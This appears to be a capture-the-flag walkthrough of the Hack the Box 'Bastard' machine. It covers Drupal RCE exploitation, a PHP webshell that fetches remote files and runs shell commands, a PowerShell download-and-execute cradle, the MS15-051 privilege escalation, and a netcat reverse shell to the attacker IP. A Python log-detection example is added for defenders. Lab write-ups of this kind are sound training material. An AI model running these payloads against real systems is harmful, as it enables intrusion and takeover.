Hack the Box - Bastard - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Bastard machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Bastard machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.100.109.
Scanning and Enumeration
We'll start by scanning for open ports with Nmap:
sudo nmap -T4 -p- 10.129.100.109
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
sudo nmap -sV -T4 -p80,135,49154 10.129.100.109
There's a web server on this target, so let's take a quick look before continuing:
http://10.129.100.109
We see there's a Drupal CMS installed on this website. Drupal is notorious for its many vulnerabilities over the years. This helps us with directory busting, because we know to include php files when we run Gobuster:
gobuster dir -u http://10.129.100.109/ -w /usr/share/wordlists/dirb/big.txt -r -x php,html,txt -s 200,204,301,302,307,403,401
We'll let that run in the background while we check if there's a robots.txt file on the server:
http://10.129.100.109/robots.txt
The robots.txt file references a CHANGELOG.txt file. That's a great place to look to confirm version info:
http://10.129.100.109/CHANGELOG.txt
Now that we have a good idea what version of Drupal this is, let's see if we can find an exploit for it:
Google search string: drupal 7.54 exploit
This looks promising. Let's take a look at the page:
https://www.ambionics.io/blog/drupal-services-module-rce
This article outlines an exploit that can be performed on Drupal 7.54. After a bit of research, it turns out that the exploit described in the article has a counterpart entry in our Kali Searchsploit repository:
searchsploit drupal module services
Let's copy this file to our working directory, then open it in Gedit to see which variables we need to change:
cp /usr/share/exploitdb/exploits/php/webapps/41564.php drupalRCE.php
gedit drupalRCE.php
To get this exploit working, we'll need to change these variables:
$url = 'http://10.129.100.109/';
$endpoint = '?????';
$file = [???????];
If we check on the website, we find that the /rest_endpoint directory doesn't exist. However, we did get some interesting results from our Gobuster scan:
That means we can fill in the endpoint_path variable like this:
$endpoint_path = '/rest';
Finally, the $file variable is going to contain the malicious webshell PHP file we want to upload to the web server. The webshell code we're using was obtained from the following URL:
https://d47zm3.me/resources/infosec/reverse-shells/
After we're done, lines 31-50 of the code look like this:
$url = 'http://10.129.100.109';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.99.99/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;
$file = [
'filename' => 'webshell.php',
'data' => $phpCode
];
The last thing to do before running this exploit is to install the php-curl package, otherwise the exploit isn't going to run properly:
sudo apt-get install php-curl
First, let's visit the webshell and get the target's system information:
http://10.129.100.109/webshell.php?fexec=systeminfo
Some important information here is the target's OS version and architecture. If we want to run any executables on the target, we'll need to make sure they're 64-bit.
Capturing the User Flag
Since we have command execution on the target via a webshell, we can capture the User flag. User flags on Hack the Box Windows systems are usually located in a user's \Desktop directory. In this case, the user's name is dimitris:
http://10.129.100.109/webshell.php?fexec=type%20c:\users\dimitris\desktop\user.txt
Foothold Enumeration
The next thing we want to do is enumerate the system for privilege escalation vulnerabilities. To do that, we'll need to host our enumeration files in a directory, and make that directory available on an HTTP server. We'll use Python's SimpleHTTPServer module to do that:
sudo python -m SimpleHTTPServer 80
As for what files we'll use for enumeration, we'll use the Sherlock.ps1 script to check for vulnerable kernel exploits. Sherlock.ps1 can be found at the following URL:
https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
After downloading the script to our working directory (where we started our HTTP server), we need to modify the script by adding this line to the end of the script:
Find-AllVulns
Then, from the webshell, we send the following command, which causes the target to use PowerShell to download and import the Sherlock.ps1 script, which we've modified to run Find-AllVulns when imported:
http://10.129.100.109/webshell.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.84:80/Sherlock.ps1') | powershell -noprofile -
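From the defender's side, the webshell calls above (the fexec/fupload parameters) and the PowerShell download cradle sent through them leave a distinctive trace in the web server's access log. The following Python is an added example, not part of the original walkthrough: it parses constructed Apache-style log lines modelled on those requests and flags the ones carrying webshell parameters or command fragments. The log lines and indicator names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format) modelled on
# the webshell requests in this walkthrough; not real captured traffic.
SAMPLE_LOG = """\
10.10.14.84 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?q=node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.84 - - [01/Jan/2024:10:00:05 +0000] "GET /webshell.php?fexec=systeminfo HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.84 - - [01/Jan/2024:10:00:09 +0000] "GET /webshell.php?fexec=type%20c:\\users\\dimitris\\desktop\\user.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.10.14.84 - - [01/Jan/2024:10:00:20 +0000] "GET /webshell.php?fexec=echo%20IEX(New-Object%20Net.WebClient).DownloadString('http://10.10.14.84:80/Sherlock.ps1')%20|%20powershell%20-noprofile%20- HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.10.14.84 - - [01/Jan/2024:10:00:30 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 30000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Parameter names of the webshell used in the walkthrough, plus command
# fragments that have no business in a CMS front end's query string.
WEBSHELL_PARAMS = {"fexec", "fupload"}
COMMAND_PATTERNS = {
    "recon-command": re.compile(r"\b(systeminfo|whoami|ipconfig)\b", re.I),
    "powershell-download-cradle": re.compile(
        r"(IEX|Invoke-Expression).*DownloadString|powershell", re.I),
    "flag-file-read": re.compile(r"\btype\b.*\.txt", re.I),
}

def analyze_request(target):
    """Return the indicator names triggered by one request target (path+query)."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = ["webshell-param:" + n for n in sorted(WEBSHELL_PARAMS & set(params))]
    decoded = " ".join(v for vals in params.values() for v in vals)  # percent-decoded
    reasons += [label for label, pat in COMMAND_PATTERNS.items() if pat.search(decoded)]
    return reasons

def scan_log(text):
    """Parse each log line and return the suspicious requests with their reasons."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        reasons = analyze_request(target)
        if reasons:
            hits.append({"client": client, "time": ts, "method": method,
                         "path": urlsplit(target).path, "status": int(status),
                         "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["path"], ", ".join(hit["reasons"]))
```

The same parser works on a real access log by reading the file instead of SAMPLE_LOG; the CHANGELOG.txt fetch is not flagged, but that file being web-readable is the version disclosure the walkthrough relies on, so restricting it is a worthwhile hardening step on its own.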
According to Sherlock, the target is vulnerable to MS15-051. Let's check for a public exploit:
Google search string: ms15-051 exploit
Let's follow that link:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
This looks like a suitable exploit, but we'll have to download the zip file, then unzip it, and copy the 64-bit version to our working directory:
wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/ms15-051.zip?raw=true
unzip ms15-051.zip\?raw=true
(zip file password: zcgonvh)
cp ms15-051/ms15-051/x64/ms15-051.exe ms15-051.exe
We'll also need to upload a Netcat executable to the target in order to get a reverse shell with elevated privileges. Because the target is a 64-bit system, we need to make sure the executable we upload is 64-bit as well. A 64-bit version of Netcat can be obtained from the following URL:
https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
So we download it to our working directory, unzip the file, then copy the 64-bit version to our working directory:
wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
unzip netcat-win32-1.11.zip
cp netcat-1.11/nc64.exe nc64.exe
Because our next action is opening a reverse shell to our attacking machine, we'll need to set up a Netcat listener on our attacking system now:
sudo nc -nlvp 443
And now to send the webshell command that uploads the Netcat executable and the exploit executable, runs the exploit executable, then runs the Netcat executable to open a reverse shell back to our attacking system:
http://10.129.100.109/webshell.php?fupload=nc64.exe&ms15-051.exe&fexec=ms15-051.exe "nc64.exe -e cmd 10.10.14.84 443"
whoami
Capturing the Root Flag
The Root flag on Hack the Box Windows systems is usually located in the Administrator's \Desktop directory.
type c:\users\administrator\desktop\root.txt.txt
Summary
After initial scans, we found that the target's installation of Drupal CMS was vulnerable to a remote command execution exploit via a vulnerable app module. We utilized the exploit to upload a webshell to the target server and enumerated the target remotely via the webshell. Finding that the target was insufficiently patched, we uploaded a public kernel exploit via the webshell and executed it, gaining a privileged reverse shell in the process and through that we were able to obtain our objective flag files.
Finish